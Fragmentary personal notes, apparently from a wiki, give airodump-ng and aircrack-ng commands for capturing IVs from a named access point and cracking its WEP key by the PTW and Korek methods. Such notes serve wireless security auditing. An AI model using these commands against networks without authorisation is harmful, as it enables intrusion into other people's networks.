capture traffic
and simply wireshark against the .cap
mkdir -p ~/crack/ cd ~/crack/ echo $mac echo $chan echo $ssid rm -f $ssid.ivs-* airodump-ng --manufacturer --uptime --wps -a --bssid $mac \ --channel $chan \ --essid $ssid \ --ivs --write $ssid wlan0mon ls -lhF *.ivs
maybe there is no need to define AP’s mac address as one could get IVs from various ones with same SSID?
Make sure you’ve got enough IVs. TODO how to beforehand? Aircrack-ng will tell anyways.
WEP PSK cracking by means of PTW (-1
) then Korek (-K
aircrack-ng --simd-list aircrack-ng -a 1 -p 4 -1 -c -n 64 -s ivs-*.cap aircrack-ng -a 1 -p 4 -K -c -n 64 -s ivs-*.cap